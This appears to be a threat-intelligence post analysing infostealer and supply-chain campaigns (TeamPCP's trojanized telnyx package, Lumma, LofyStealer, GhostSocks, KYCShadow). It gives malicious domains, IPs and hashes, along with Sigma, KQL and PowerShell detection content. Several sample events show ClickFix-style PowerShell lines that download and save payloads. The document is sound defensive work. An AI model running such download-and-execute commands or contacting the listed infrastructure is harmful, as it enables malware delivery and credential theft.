
TeamPCP Supply Chain & Multi-Stage Infostealers: OTX Pulse Analysis — Lumma, LofyStealer, KYCShadow

Security Arsenal Team
May 1, 2026

Recent OTX pulses indicate a coordinated surge in credential theft activity spanning supply chain compromises, social engineering, and mobile malware. Threat actors TeamPCP, LofyGang, and unknown groups deploying Lumma Stealer and KYCShadow are actively targeting enterprises and consumers.

Collective Attack Chain:

  1. Initial Access: Supply chain compromise (Telnyx Python SDK via PyPI), ClickFix-style phishing (PowerShell obfuscation), and WhatsApp distribution (Android).
  2. Execution: Multi-stage loaders utilizing Node.js, PowerShell, and Python to deploy payloads, often using steganography (WAV files) or DLL sideloading.
  3. Objectives: Harvesting browser cookies, passwords, banking tokens (2FA), and system credentials. Use of residential proxies (GhostSocks) to obfuscate C2 traffic.

Threat Actor / Malware Profile

| Malware Family / Actor | Description | Distribution | Behavior & Persistence |
|---|---|---|---|
| TeamPCP | Supply chain attackers utilizing Python packages. | Malicious telnyx SDK on PyPI (750k downloads). | Uses a 3-stage architecture: trojanized package -> platform loader -> payload hidden in a WAV file via steganography. Steals credentials and encrypts them for exfiltration. |
| LofyStealer | Infostealer targeting gamers (Minecraft). | Social engineering; Node.js loader disguised as legitimate libs. | 53.5MB Node.js loader drops a 1.4MB C++ payload. Executes in-memory, targeting 8 browsers for cookies/passwords/tokens. Uses syscalls for evasion. |
| Lumma Stealer | Information stealer (observed via ClickFix & GhostSocks). | Phishing sites (ClickFix), PowerShell scripts. | Uses HijackLoader for DLL sideloading. Often paired with the GhostSocks proxy to blend traffic. Steals sensitive data from browsers and crypto wallets. |
| GhostSocks | Malware-as-a-Service (MaaS) turning devices into proxies. | Marketed on Russian forums. | Written in GoLang. Uses SOCKS5 and TLS encryption. Acts as a backdoor and residential proxy network. Partners with Lumma Stealer. |
| KYCShadow | Android banking trojan. | WhatsApp distribution masquerading as a bank KYC app. | Multi-stage dropper using native code obfuscation. Uses Firebase C2, WebView phishing, and SMS interception to steal OTPs. Manipulates VPN traffic. |

IOC Analysis

The provided pulses include a mix of network and file-based indicators critical for detection.

  • Network IOCs:

    • Domains: aquasecurtiy.org, retreaw.click, serv.xyz, serv.biz, api.biz.
    • IPs: 85.11.161.198 (Lumma C2/Download server), 24.152.36.241 (LofyStealer).
    • Hostnames: w2.bruggebogeyed.site, tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io.
    • Action: Block these domains and IPs immediately on perimeter firewalls and secure web gateways (SWG). Hunt for outbound connections to port 9658 and non-standard HTTP ports associated with the ClickFix campaign.
  • File IOCs:

    • Hashes: Multiple MD5, SHA1, and SHA256 hashes for loaders, payloads, and droppers (e.g., f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc).
    • Action: Load these hashes into EDR solutions for immediate scanning. Isolate endpoints returning positive matches.
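
The network-IOC actions above (block the listed domains/IPs, hunt for port 9658) can be checked against exported proxy or firewall logs before the blocks are in place. The following is an added example, not code from the pulses or from Security Arsenal: it matches the page's own indicators against a few constructed key=value log lines. The log format, field names (src, dst, dport, host) and the sample entries are assumptions for the demo; adapt the parser to your SWG or firewall export.

```python
# IOCs taken from the IOC Analysis section above.
MALICIOUS_DOMAINS = {"aquasecurtiy.org", "retreaw.click", "serv.xyz", "serv.biz", "api.biz"}
MALICIOUS_HOSTNAMES = {"w2.bruggebogeyed.site", "tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io"}
MALICIOUS_IPS = {"85.11.161.198", "24.152.36.241"}
SUSPICIOUS_PORTS = {9658}

# Constructed sample records (assumed key=value export format; not real telemetry).
SAMPLE_LOGS = """\
ts=2026-05-01T08:12:03Z src=10.20.1.15 dst=85.11.161.198 dport=443 host=-
ts=2026-05-01T08:12:09Z src=10.20.1.15 dst=172.67.10.10 dport=443 host=cdn.retreaw.click
ts=2026-05-01T08:13:44Z src=10.20.1.22 dst=203.0.113.40 dport=9658 host=-
ts=2026-05-01T08:14:01Z src=10.20.1.30 dst=142.250.74.46 dport=443 host=www.google.com
ts=2026-05-01T08:15:27Z src=10.20.1.41 dst=198.51.100.7 dport=443 host=w2.bruggebogeyed.site
"""


def parse_line(line: str) -> dict:
    """Parse one key=value record into a dict; malformed tokens are ignored."""
    fields = {}
    for token in line.split():
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    return fields


def matches_domain(host: str, bad_domain: str) -> bool:
    """True for the domain itself or any subdomain; 'observ.xyz' must not match 'serv.xyz'."""
    host = host.lower().rstrip(".")
    return host == bad_domain or host.endswith("." + bad_domain)


def classify(rec: dict) -> list:
    """Return the list of reasons a record is suspicious (empty list = clean)."""
    reasons = []
    dst = rec.get("dst", "")
    host = rec.get("host", "-")
    if dst in MALICIOUS_IPS:
        reasons.append(f"known C2/download IP {dst}")
    if host != "-":
        if host.lower() in MALICIOUS_HOSTNAMES:
            reasons.append(f"known malicious hostname {host}")
        for domain in sorted(MALICIOUS_DOMAINS):
            if matches_domain(host, domain):
                reasons.append(f"host {host} under blocked domain {domain}")
    try:
        port = int(rec.get("dport", "0"))
    except ValueError:
        port = 0
    if port in SUSPICIOUS_PORTS:
        reasons.append(f"outbound connection to suspicious port {port}")
    return reasons


def hunt(log_text: str) -> list:
    """Return (timestamp, source, reasons) for every record that hits an indicator."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append((rec.get("ts", "?"), rec.get("src", "?"), reasons))
    return hits


if __name__ == "__main__":
    for ts, src, reasons in hunt(SAMPLE_LOGS):
        print(f"{ts} {src}: " + "; ".join(reasons))
```

Each hit names the internal source address so the isolation step in the Response Priorities can be applied per host; the domain check deliberately uses suffix-plus-dot matching so short indicators such as serv.xyz do not produce false positives on unrelated hostnames.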

Detection Engineering

Sigma Rules

```yaml
title: Suspicious PowerShell Download and Execution - ClickFix/Lumma
description: Detects PowerShell commands downloading MSI files or payloads, typical of ClickFix campaigns leading to Lumma Stealer.
status: stable
date: 2026/05/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/64b123456789
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'DownloadString'
            - 'Invoke-WebRequest'
            - 'OutFile'
    selection_payload:
        CommandLine|contains:
            - '.msi'
            - '.dll'
    condition: all of selection*
falsepositives:
    - Legitimate software installation scripts
level: high
tags:
    - attack.execution
    - attack.t1059.001
    - attack.command_and_control
    - attack.t1071.001
---
title: Potential Malicious Python Package Execution - TeamPCP
description: Detects Python processes executing code from directories associated with package installations, connecting to suspicious external endpoints or launching msbuild.
status: stable
date: 2026/05/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/64b987654321
logsource:
    product: windows
    category: process_creation
detection:
    selection_python:
        Image|endswith: '\python.exe'
    selection_parent:
        ParentImage|contains:
            - '\Scripts\'
            - '\site-packages\'
    selection_suspicious_child:
        CommandLine|contains:
            - 'msbuild.exe'
            - 'cmd.exe /c'
    condition: selection_python and selection_parent and selection_suspicious_child
falsepositives:
    - Legitimate developer builds
level: medium
tags:
    - attack.initial_access
    - attack.t1195.002
    - attack.defense_evasion
    - attack.t1027
---
title: GoLang Binary Proxy Behavior - GhostSocks
description: Detects GoLang compiled binaries establishing SOCKS5 proxy connections or TLS traffic to non-standard ports, indicative of GhostSocks activity.
status: stable
date: 2026/05/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/64b555555555
logsource:
    product: windows
    category: network_connection
detection:
    selection_golang:
        # Broad on purpose; 'go' also matches e.g. GoogleUpdate.exe, so tune to your environment
        Image|contains: 'go'
    selection_ports:
        DestinationPort:
            - 1080
            - 443
            - 9658
    selection_socks:
        CommandLine|contains: 'socks'
    # The binary selection must hold; either the port or the SOCKS indicator completes the match
    # (a bare "1 of selection*" would fire on every connection to 443)
    condition: selection_golang and (selection_ports or selection_socks)
falsepositives:
    - Legitimate Go applications using network
level: medium
tags:
    - attack.command_and_control
    - attack.t1090.003
    - attack.t1572
```
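
To sanity-check the first Sigma rule before deploying it, the logic can be replayed against a handful of process-creation events. The block below is an added example, not the page's or Security Arsenal's code: a minimal evaluator for the field modifiers (endswith, contains) and the "all of / 1 of" condition quantifiers that rule uses, run over constructed events in Sysmon field naming. The events, the example.invalid URLs and the evaluator itself are assumptions for the demo; the rule content is transcribed from the YAML above.

```python
# The ClickFix/Lumma rule above, transcribed as {selection: {"Field|modifier": value(s)}}.
CLICKFIX_RULE = {
    "selection": {
        "Image|endswith": "\\powershell.exe",
        "CommandLine|contains": ["DownloadString", "Invoke-WebRequest", "OutFile"],
    },
    "selection_payload": {
        "CommandLine|contains": [".msi", ".dll"],
    },
}
CONDITION = "all of selection*"

# Constructed process_creation events (assumed telemetry, not from the pulses).
SAMPLE_EVENTS = [
    {   # ClickFix-style one-liner: fetch an MSI and write it to disk -> should match
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -w hidden -c "Invoke-WebRequest https://example.invalid/u.msi -OutFile $env:TEMP\u.msi"',
    },
    {   # benign scheduled script: no download verb, no payload extension
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1",
    },
    {   # download verb present but no .msi/.dll: only one of the two selections holds
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -c IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')",
    },
    {   # same behaviour under PowerShell 7: Image is pwsh.exe, which the rule as written misses
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": r"pwsh -c Invoke-WebRequest https://example.invalid/x.dll -OutFile x.dll",
    },
]


def field_matches(event: dict, field_spec: str, expected) -> bool:
    """Apply one 'Field|modifier' test; string matching is case-insensitive as in Sigma."""
    name, _, modifier = field_spec.partition("|")
    actual = str(event.get(name, "")).lower()
    values = expected if isinstance(expected, list) else [expected]
    for value in values:          # a list of values is OR-ed
        value = str(value).lower()
        if modifier == "contains" and value in actual:
            return True
        if modifier == "endswith" and actual.endswith(value):
            return True
        if modifier == "startswith" and actual.startswith(value):
            return True
        if modifier == "" and actual == value:
            return True
    return False


def selection_matches(event: dict, selection: dict) -> bool:
    """All fields inside one selection are AND-ed."""
    return all(field_matches(event, spec, exp) for spec, exp in selection.items())


def evaluate(event: dict, rule: dict = CLICKFIX_RULE, condition: str = CONDITION) -> bool:
    """Evaluate an 'all of <prefix>*' or '1 of <prefix>*' condition against one event."""
    quantifier, _, pattern = condition.partition(" of ")
    prefix = pattern.rstrip("*")
    results = [selection_matches(event, sel) for name, sel in rule.items() if name.startswith(prefix)]
    if not results:
        return False
    return all(results) if quantifier == "all" else any(results)


def hunt(events: list, **kwargs) -> list:
    """Indices of the events that fire the rule."""
    return [i for i, event in enumerate(events) if evaluate(event, **kwargs)]


if __name__ == "__main__":
    for i in hunt(SAMPLE_EVENTS):
        print(f"event {i} matched: {SAMPLE_EVENTS[i]['CommandLine']}")
```

Only the first event fires, which is the intended behaviour; the fourth shows a coverage gap worth closing by adding '\pwsh.exe' to the Image|endswith list, since ClickFix lures run just as well under PowerShell 7.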

KQL (Microsoft Sentinel)

```kql
// Hunt for connections to known malicious infrastructure
let MaliciousIPs = dynamic(["85.11.161.198", "24.152.36.241"]);
let MaliciousDomains = dynamic(["serv.biz", "serv.xyz", "api.biz", "retreaw.click", "aquasecurtiy.org"]);
// DeviceNetworkEvents (Defender for Endpoint); for firewall data use CommonSecurityLog instead
DeviceNetworkEvents
| where RemoteIP in (MaliciousIPs) or RemoteUrl has_any (MaliciousDomains)
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, RemotePort, InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
```

Run the hash hunt as a separate query (KQL allows only one tabular expression per query):

```kql
// Hunt for known file hashes (all values below are SHA256)
let MaliciousHashes = dynamic([
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
    "1d261b45e73b5b712becb12ed182ec89d3dd0d73143a2dd8ff5512da489a50eb"
]);
DeviceFileEvents
| where SHA256 in (MaliciousHashes)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
| order by Timestamp desc
```

PowerShell Hunt Script

```powershell
# IOC Hunt Script for TeamPCP, LofyStealer, Lumma, and KYCShadow droppers
# Requires Administrator privileges
# All values are SHA256 hashes from the OTX pulses referenced above

$TargetHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a", # TeamPCP
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2", # TeamPCP
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881", # LofyStealer
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7", # LofyStealer
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc", # Lumma/HijackLoader
    "1d261b45e73b5b712becb12ed182ec89d3dd0d73143a2dd8ff5512da489a50eb"  # KYCShadow
)

Write-Host "[+] Scanning system for known malicious file hashes..." -ForegroundColor Cyan

# Search the C: drive (adjust drive letters or paths for your environment)
Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue -Include *.exe, *.dll, *.msi, *.py, *.wav, *.apk |
    ForEach-Object {
        $file = $_
        # Get-FileHash returns $null for locked/unreadable files; skip those instead of comparing $null
        $hash = (Get-FileHash -Path $file.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($hash -and ($hash -in $TargetHashes)) {
            Write-Host "[!] MALICIOUS FILE DETECTED: $($file.FullName)" -ForegroundColor Red
            Write-Host "    SHA256: $hash"
            Write-Host "    Creation Time: $($file.CreationTime)"
        }
    }

Write-Host "[+] Scan Complete." -ForegroundColor Green
```


Response Priorities

Immediate (0-24h)

  • Block IOCs: Push all IP addresses and domains listed in the IOC Analysis section to firewalls, SIEM blocklists, and Secure Web Gateways.
  • Hunt for Compromise: Run the provided PowerShell script on critical endpoints to check for the presence of malware files.
  • Isolate Infected Hosts: If any file hashes or network connections are detected, isolate the affected machine from the network immediately.

Short-term (24-48h)

  • Credential Reset: If credential-stealing malware (Lumma, LofyStealer, TeamPCP) is suspected to have executed, force a password reset for all users on the affected segment, prioritizing service accounts and administrators.
  • Supply Chain Audit: Developers must audit the telnyx package versions in use. Upgrade to the latest verified version immediately. Remove any suspicious Node.js packages.
  • Mobile Threat Check: Send alerts to mobile device users (specifically in targeted regions like India) warning about fake KYC apps. Check MDM for the presence of the serv.* domains (serv.xyz, serv.biz) in network logs.

Long-term (1 Week+)

  • Architecture Hardening: Implement Python package verification mechanisms (e.g., cryptographic hash checking of artifacts before installation) to prevent supply chain attacks.
  • Proxy Detection: Enhance network monitoring to detect anomalous SOCKS5 traffic and TLS-encrypted proxy patterns typical of GhostSocks.
  • Phishing Resilience: Conduct security awareness training focusing on "ClickFix" social engineering (fake browser errors leading to PowerShell execution).
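
The supply-chain items above (audit the telnyx versions in use; verify artifact hashes before installation) come down to refusing any package whose digest is not on an allow-list. The following is an added example, not code from the page or from Telnyx: it reads pins in pip's `--hash=sha256:` requirements syntax, hashes a downloaded artifact, and rejects it on mismatch or when no pin exists. The package bytes, file names and hash values are constructed for the demo (they are not real telnyx release hashes); in production the same check is what `pip install --require-hashes -r requirements.txt` performs, with pins generated by `pip-compile --generate-hashes`.

```python
import hashlib
import re
import tempfile
from pathlib import Path

HASH_PIN = re.compile(r"--hash=sha256:([0-9a-f]{64})")


def parse_requirements(text: str) -> dict:
    """Return {package_name: {sha256, ...}} from a hashed requirements file.
    Continuation lines end in a backslash, as pip-compile writes them."""
    pinned = {}
    logical = text.replace("\\\n", " ")          # join continuation lines
    for line in logical.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name = re.split(r"[=<>!~ ]", line, maxsplit=1)[0].lower()
        pinned[name] = set(HASH_PIN.findall(line))
    return pinned


def sha256_of(path) -> str:
    """Stream the file so large wheels do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifact(path, package: str, pinned: dict) -> tuple:
    """Return (ok, reason). Unpinned packages are refused, not silently allowed."""
    expected = pinned.get(package.lower())
    if not expected:
        return False, f"{package}: no pinned hash; refusing unverified install"
    digest = sha256_of(path)
    if digest not in expected:
        return False, f"{package}: digest {digest[:12]}... not in pinned set"
    return True, f"{package}: digest matches pinned hash"


def run_demo() -> dict:
    """Constructed scenario: one artifact matches its pin, one was altered, one has no pin."""
    good = b"constructed wheel contents for the demo, version 2.0.0"
    tampered = good + b"\n# extra bytes appended after the pin was generated"
    requirements = (
        "telnyx==2.0.0 \\\n"
        f"    --hash=sha256:{hashlib.sha256(good).hexdigest()}\n"
        "requests==2.32.0 \\\n"
        f"    --hash=sha256:{'0' * 64}\n"            # placeholder pin for an unrelated package
    )
    pinned = parse_requirements(requirements)
    with tempfile.TemporaryDirectory() as tmp:
        good_path = Path(tmp, "telnyx-2.0.0-py3-none-any.whl")   # constructed file name
        bad_path = Path(tmp, "telnyx-2.0.1-py3-none-any.whl")    # constructed file name
        good_path.write_bytes(good)
        bad_path.write_bytes(tampered)
        return {
            "good": verify_artifact(good_path, "telnyx", pinned),
            "tampered": verify_artifact(bad_path, "telnyx", pinned),
            "unpinned": verify_artifact(good_path, "some-other-pkg", pinned),
        }


if __name__ == "__main__":
    for case, (ok, reason) in run_demo().items():
        print(f"{case:9} {'ALLOW' if ok else 'REFUSE'}  {reason}")
```

The refuse-by-default branch for unpinned packages is the part that matters against a trojanized release: a new upload to PyPI under a known name has a digest nobody has pinned yet, so it is blocked until a developer reviews and re-pins it.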
